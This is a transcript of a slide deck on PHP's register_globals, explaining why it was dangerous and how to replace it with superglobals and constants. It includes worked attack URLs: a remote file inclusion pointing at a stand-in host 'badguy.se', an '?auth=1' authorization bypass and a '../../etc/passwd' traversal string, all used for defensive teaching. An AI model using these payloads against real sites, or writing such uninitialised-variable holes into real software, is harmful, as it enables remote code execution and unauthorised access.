Published by Evangeline Wheeler. Modified over 9 years ago.
PHP Security: register_globals
How To Make It Difficult For Hackers To Set Variables
What Is register_globals?
- A php.ini directive (true/false) that makes PHP automatically turn environment, GET, POST, cookie and server data into global variables before the script runs.
- Cf. variables_order (EGPCS): it sets the order in which those sources are imported, and a later source overwrites an earlier one of the same name.
Examples (Part 1)
The slide shows a form with fields named mytext and myhide (not reproduced here). With register_globals turned on, PHP automatically creates the variables $mytext and $myhide and populates them with the values entered in the form, whether the form was submitted by GET or by POST.
Examples (Part 2)
Similarly, with the URL
  http://example.com/index.php?george=jungle
PHP creates $george for you and gives it the value "jungle".
Cookie, server and environment variables such as $DOCUMENT_ROOT and $PHP_SELF are also created and populated automatically. You do not know where a given value came from (any of E, G, P, C or S).
Problems (Part 1)

<?php
// ...some code...
include "$libdir/functions.inc";
// ...more code...
?>

If the script has not assigned $libdir itself on the code path that reaches the include (for example it is meant to come from a config file that was not loaded), a user can set $libdir in the URL and the include uses that value. E.g.:
  http://example.com/index.php?libdir=http://badguy.se/hack
This is remote file inclusion, not cross-site scripting: where URL includes are permitted (allow_url_fopen, and on PHP 5.2 and later allow_url_include), PHP fetches http://badguy.se/hack/functions.inc and executes it on the server. An assignment to $libdir made before the include would overwrite the attacker's value; the danger is the path where no such assignment runs.
Problems (Part 2)

<?php
if ($auth == 1) {
    // do stuff for authorized users
} else {
    echo "Not authorized!";
}
?>

If nothing in the script assigns $auth before the check (for example the login code only sets it on success, and never runs for an anonymous visitor), a user can set $auth in the URL and gain unauthenticated access. E.g.:
  http://example.com/index.php?auth=1
Note the loose comparison: request values arrive as strings, and "1" == 1 is true.
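The two attacks above, as an added example that is not part of the original slides. register_globals was removed in PHP 5.4, so the block reproduces its effect with extract() on a constructed $_GET; the request values, the $config flag and the paths are constructed for illustration, and the remote include is only printed, never executed.

```php
<?php
// Added example, not from the slides: emulate register_globals with extract()
// so the two attacks above can be traced on any PHP version (the directive
// was removed in PHP 5.4). Request values and the $config flag are constructed.

// Constructed request: index.php?auth=1&libdir=http://badguy.se/hack
$_GET = ['auth' => '1', 'libdir' => 'http://badguy.se/hack'];

// This is what register_globals did before the first line of the script
// ran: each request parameter became a global variable of the same name.
extract($_GET);

// Slide 5 pattern. $libdir is expected to come from a config file; on the
// code path where that file is absent, nothing overwrites the attacker's
// value and the include would use it.
$config = false;                  // constructed: config.php was not found
if ($config) {
    $libdir = '/var/www/lib';     // the value the author intended
}
// With allow_url_fopen (and on PHP 5.2+ allow_url_include) enabled, the
// real statement include "$libdir/functions.inc" would fetch and execute
// http://badguy.se/hack/functions.inc. Only the resolved path is shown.
echo "would include: $libdir/functions.inc\n";

// Slide 6 pattern. $auth is meant to be set by a login check that did not
// run, so it still holds the attacker's "1". The loose == accepts the
// string "1" as equal to the integer 1.
if ($auth == 1) {
    echo "authorized branch reached without logging in\n";
} else {
    echo "Not authorized!\n";
}
```

Run it with `php` on the command line: both messages show the attacker's values being used, even though the script never assigned $libdir or $auth from its own code.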
Solutions (Part 1)
- Don't let anyone see your code: if they don't know what variables to set, they can't crack your script.
  - This is security through obscurity; it does not work well, if at all.
- Check all variables before using them.
  - Good practice anyway.
  - Sometimes hard to check (e.g., $auth: the variable is not malformed, it is simply not yours).
Solutions (Part 2)
- Turn off register_globals!
  - Off by default in PHP 4.2.0 and later anyway; deprecated in PHP 5.3.0 and removed in PHP 5.4.0.
  - Where you cannot edit php.ini, `php_flag register_globals off` in .htaccess works under mod_php (the directive is PHP_INI_PERDIR, so ini_set() from the script is too late).
- Use the track_vars arrays instead, always on since PHP 4.0.3: $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS, $HTTP_POST_FILES, $HTTP_ENV_VARS, $HTTP_COOKIE_VARS.
- From PHP 4.1.0 the same data is available in the superglobals, which are visible in every scope: $_GET, $_POST, $_SERVER, $_FILES, $_ENV, $_COOKIE.
Solution Examples (Part 1)
With register_globals turned off, PHP populates $_POST['mytext'] and $_POST['myhide'] for the form. If the method was GET, the values are in $_GET[] instead.
Solution Examples (Part 2)
If a value is set in the URL
  http://example.com/index.php?george=jungle
it becomes $_GET['george'] = "jungle".
- POST-method variables are in $_POST
- GET-method and URL variables are in $_GET
- Server variables are in $_SERVER
- Uploaded files are in $_FILES
- Cookie values are in $_COOKIE
- Environment settings are in $_ENV
You know exactly where each value was set from.
Use define For Path Names
- If you have to set directory paths, use constants instead of variables:
    define('LIBDIR', '/path/to/lib');
- Pathnames are especially dangerous in variables because an attacker-controlled path in an include or require leads directly to local or remote file inclusion, i.e. code execution.
- Once set, a constant cannot be redefined, so it is far more robust against accidental or unexpected reassignment and against hack attempts.
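The two vulnerable scripts rewritten the way Solutions (Part 2), the Solution Examples and this slide recommend, as an added example that is not part of the original slides: register_globals is checked and refused, the library path is a constant with an allowlisted file name, authorization comes only from server-side session state, and request data is read from the superglobal for the method in use and validated. LIBDIR (set to __DIR__ so the file runs anywhere), the parameter names, the session key and the sample request are constructed for illustration.

```php
<?php
// Added example, not from the slides: the two scripts rewritten the way
// slides 8 to 11 recommend. LIBDIR, the parameter names and the session
// key are constructed for illustration.

// Refuse to run if the directive is on. ini_get() gives a falsy value when
// it is off, and false when it no longer exists (PHP 5.4 and later).
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    exit("register_globals is enabled; refusing to run\n");
}

// Slide 11: a constant cannot be redefined, by a request or by later code.
// __DIR__ is used so the example runs anywhere; a real deployment would use
// an absolute path outside the document root.
define('LIBDIR', __DIR__);

// Build an include path under LIBDIR from a file name that must match an
// allowlist: no slashes, no "..", no URL scheme. Returns null otherwise.
function libraryFile(string $name): ?string
{
    if (!preg_match('/^[A-Za-z0-9_][A-Za-z0-9_.-]*$/', $name)
        || strpos($name, '..') !== false) {
        return null;
    }
    return LIBDIR . DIRECTORY_SEPARATOR . $name;
}

// Slide 6 rewritten: authorization is derived from server-side session
// state, never from request data, and the result always has a value.
function isAuthorized(array $session): bool
{
    return isset($session['user_id']) && is_int($session['user_id']);
}

// Slides 9 and 10 rewritten: read from the superglobal for the method
// actually used, and validate type and range before use.
function requestedPage(array $get): int
{
    $page = filter_var($get['page'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return $page === false ? 1 : $page;
}

// Constructed request: index.php?auth=1&libdir=http://badguy.se/hack&page=3
$_GET = ['auth' => '1', 'libdir' => 'http://badguy.se/hack', 'page' => '3'];
$_SESSION = [];   // constructed: nobody is logged in

$auth = isAuthorized($_SESSION) ? 1 : 0;  // 0: auth=1 in the query is never consulted
$lib  = libraryFile('functions.inc');     // LIBDIR/functions.inc
$bad  = libraryFile('../../etc/passwd');  // null: rejected by the allowlist
$page = requestedPage($_GET);             // 3

if ($auth == 1) {
    echo "authorized\n";
} else {
    echo "Not authorized!\n";
}
printf("page=%d lib=%s bad=%s\n", $page, $lib, var_export($bad, true));
```

The point of initialising $auth from isAuthorized() rather than leaving it to a login routine is that there is no code path on which the variable is unset; whether or not register_globals is on, a request parameter named auth has no way into the check.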